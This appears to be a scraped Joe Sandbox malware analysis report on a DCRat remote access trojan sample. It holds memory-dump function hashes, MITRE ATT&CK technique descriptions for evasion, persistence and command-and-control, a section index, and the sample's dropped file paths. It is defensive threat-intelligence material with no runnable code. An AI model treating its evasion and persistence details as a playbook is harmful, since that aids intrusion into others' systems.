Source File: 0000001A.00000002.1870866636.00007FF887A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887a70000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: acfab9830192e4565df3119166f588b63edeacdb526b907fa3db6129665567ae
Instruction ID: 4d34a1f5a9e3a6e1680f2d3455148d9a204aed5f9ac902c324767ff299312dc5
Opcode Fuzzy Hash: acfab9830192e4565df3119166f588b63edeacdb526b907fa3db6129665567ae
Instruction Fuzzy Hash: 32F039308AA94D9EEB40EF6484896FE77B4FF18385F00057AE81CC2191DA3465A4CB41

Function 00007FF887A78328 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1870866636.00007FF887A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887a70000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 175f5aa5ecd037f027dacdbc6935ea4765ed6a8f6f8b5b2868d9803fa3d5b9c3
Instruction ID: 9811eb975e1175d912aed068deb4b7eacbad9c6cfb1e26d7a7004406b864bf5b
Opcode Fuzzy Hash: 175f5aa5ecd037f027dacdbc6935ea4765ed6a8f6f8b5b2868d9803fa3d5b9c3
Instruction Fuzzy Hash: B1F03930CA850D9BEB50FFA4C4496FD77B4FF18384F41047AE81DD2190DA34A2A4CA41

Function 00007FF887A71250 Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1870866636.00007FF887A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887a70000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ba63c8834bccfc240ecb72307ca063d15481292f7217a39fc085560aa1cca1bd
Instruction ID: 3c0cbfb82d2c9b9086ed96dc528f169b2ebc321d7791231e9945436cc764279f
Opcode Fuzzy Hash: ba63c8834bccfc240ecb72307ca063d15481292f7217a39fc085560aa1cca1bd
Instruction Fuzzy Hash: 32F039709A810ECBEB54EB40D8829BE73F5BF853C0F504239D09AD2292CF786904CB80

Function 00007FF887A70C36 Relevance: .0, Instructions: 23COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1870866636.00007FF887A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887a70000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 039ec7402a692566396ef587d570993229498bf65e5821f4dcb04440d311637f
Instruction ID: 378be46ddfabf3b60fdcf2e596af044c970d758a0ddc58be99a8606dd02c9074
Opcode Fuzzy Hash: 039ec7402a692566396ef587d570993229498bf65e5821f4dcb04440d311637f
Instruction Fuzzy Hash: F2E0E530ECE4078AE710AA1488D66BF7274FF513D1F109A31D47A82286DE7CA145CA80

Function 00007FF887A70C04 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1870866636.00007FF887A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887a70000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b22a659e8fdb1ec984cd683ac48b0c7d07b86e54f74f3e0289ca4d7d8cf64b3
Instruction ID: 873b5f2cd8ff6b003610ce832a30adaf1ca6f84ae7d15cba05d21f83085bb7ce
Opcode Fuzzy Hash: 9b22a659e8fdb1ec984cd683ac48b0c7d07b86e54f74f3e0289ca4d7d8cf64b3
Instruction Fuzzy Hash: 4DE0BF30E894078AE710AB54C8856BF7374FB513D1F109635D47586285DE7C6545CB85

Function 00007FF887A7114D Relevance: .0, Instructions: 17COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1870866636.00007FF887A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887a70000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d1885b09f3ddbba1a846fccf970714f50e907a024b9cb59dbf7fde6ff23ee9c1
Instruction ID: 063e4849cf6c280f90db2e9a752978d50bda6eba4ee91d4346ebe172b145039e
Opcode Fuzzy Hash: d1885b09f3ddbba1a846fccf970714f50e907a024b9cb59dbf7fde6ff23ee9c1
Instruction Fuzzy Hash: 87E0EC30A5451ECFDB14EF40C8959BE73F1FB94391F000A79D426D72A1DBB8A504CB80

Function 00007FF887A70BF5 Relevance: .0, Instructions: 15COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1870866636.00007FF887A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887a70000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8c5c3147754399c57c45c254844fbbac12ef5a865cf069ce063cba924b10a3ad
Instruction ID: b287d3ce67ea1c37b684858a2340345f7ada5f59e737b4c309032675019da93b
Opcode Fuzzy Hash: 8c5c3147754399c57c45c254844fbbac12ef5a865cf069ce063cba924b10a3ad
Instruction Fuzzy Hash: 66E01230E45406CBE710DB44CC856BF73B0FB50391F008225C42687289DA3CA545CF80

Function 00007FF887A7141A Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1870866636.00007FF887A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887a70000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 80853a38301b06026ca6443608c81f1fe410c091c32c5848adf9368b6cfc2b9f
Instruction ID: 6219e1b42368dc4ec8e3e142da1e314ee3bd32674d74cce04f1175e42a6cdad9
Opcode Fuzzy Hash: 80853a38301b06026ca6443608c81f1fe410c091c32c5848adf9368b6cfc2b9f
Instruction Fuzzy Hash: D5D09E70954A299EDB90DB54C4457AEB6F0BF05345F0001B5D45CD1141DB7815C48F41

Function 00007FF887A7147E Relevance: .0, Instructions: 5COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000001A.00000002.1870866636.00007FF887A70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF887A70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_26_2_7ff887a70000_explorer.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c3bfdd0e236329f2dc260553f4b612bea235462995b01530acd1fbb714c54e41
Instruction ID: d1707648cd4b220ee008ffb6ae588993507abca8012070804501b04af054e379
Opcode Fuzzy Hash: c3bfdd0e236329f2dc260553f4b612bea235462995b01530acd1fbb714c54e41
Instruction Fuzzy Hash: 76B01230D6801ACAE740DB40C8827BF72B0BF803C4F400034E459A21D1CF782900C780

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report LisectAVT_2403002A_442.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: DCRat

Yara Signatures

Memory Dumps

Sigma Signatures

System Summary

Snort Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Recovery\31997539b722e54a2a7374467bac21ada08fa869

C:\Recovery\jOMfQSwRhTi.exe

C:\Users\Public\AccountPictures\31997539b722e54a2a7374467bac21ada08fa869

C:\Users\Public\AccountPictures\jOMfQSwRhTi.exe

C:\Users\user\31997539b722e54a2a7374467bac21ada08fa869

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\dwm.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\explorer.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\jOMfQSwRhTi.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\perfCrtmonitorsvcMonitorDll.exe.log

C:\Users\user\AppData\Local\Temp\AivFMEfd19.bat

C:\Users\user\AppData\Local\Temp\GjKBlYoEBb

C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Jg3j8KEAq3O.bat

C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\Uj422BG5H91CLq69Aho3ql.vbe

C:\Users\user\AppData\Local\Temp\perfCrtmonitorsvc\perfCrtmonitorsvcMonitorDll.exe

Windows Analysis Report
LisectAVT_2403002A_442.exe

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre